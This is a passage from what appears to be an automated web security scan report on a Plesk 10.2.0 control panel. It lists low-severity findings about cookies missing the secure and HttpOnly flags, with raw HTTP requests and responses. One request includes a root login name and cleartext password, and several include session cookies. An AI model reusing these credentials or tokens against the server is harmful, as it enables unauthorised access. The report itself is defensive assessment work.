Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/sessions/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 16:05:22 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 16:05:23 GMT
Server: sw-cp-server
Content-Length: 11352

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="094
...[SNIP]...

4.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/preferences

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/preferences?context=interface-pref HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=reseller-tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 14:16:08 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=interface-pref; path=/
Date: Sat, 24 Sep 2011 14:16:08 GMT
Server: sw-cp-server
Content-Length: 7293

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="23c
...[SNIP]...

4.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:30:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: reseller_report__report_id=2
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:16 GMT
Server: sw-cp-server
Content-Length: 15748

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/
Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:30:21 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:21 GMT
Server: sw-cp-server
Content-Length: 9967

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.59. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@1/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@1/properties/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@1/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:30:34 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:35 GMT
Server: sw-cp-server
Content-Length: 8161

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.60. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@2/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@2/properties/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@2/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:30:34 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:34 GMT
Server: sw-cp-server
Content-Length: 8192

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@new/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@new/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:30:25 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:25 GMT
Server: sw-cp-server
Content-Length: 9935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

4.62. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@new/properties/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@new/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/
Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:30:25 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:25 GMT
Server: sw-cp-server
Content-Length: 8336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 62 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /login_up.php3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login_up.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Content-Length: 55
Cache-Control: max-age=0
Origin: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

login_name=root&passwd=JAlQj9rh&locale_id=default&send=

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:24:04 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Type: text/html; charset=utf-8
X-Plesk: PSA-Key/PLSK016479390000
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; path=/
Set-Cookie: locale=en-US; expires=Sat, 22-Sep-2012 18:24:06 GMT; path=/
Set-Cookie: no_frames=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_root_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_login_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_logout_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Date: Fri, 23 Sep 2011 18:24:06 GMT
Server: sw-cp-server
Content-Length: 1232


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

5.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/app/usage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/app/usage HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:27:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:27:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:27:17 GMT
Server: sw-cp-server
Content-Length: 8399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/edit/id/5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/edit/id/5 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list?context=service-plans
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:55:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:55:10 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=service-plans; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:55:12 GMT
Server: sw-cp-server
Content-Length: 160630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer-service-plan/list?context=service-plans HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; BarExpanded=True; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:12:54 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:12:54 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=service-plans; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:12:55 GMT
Server: sw-cp-server
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

5.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
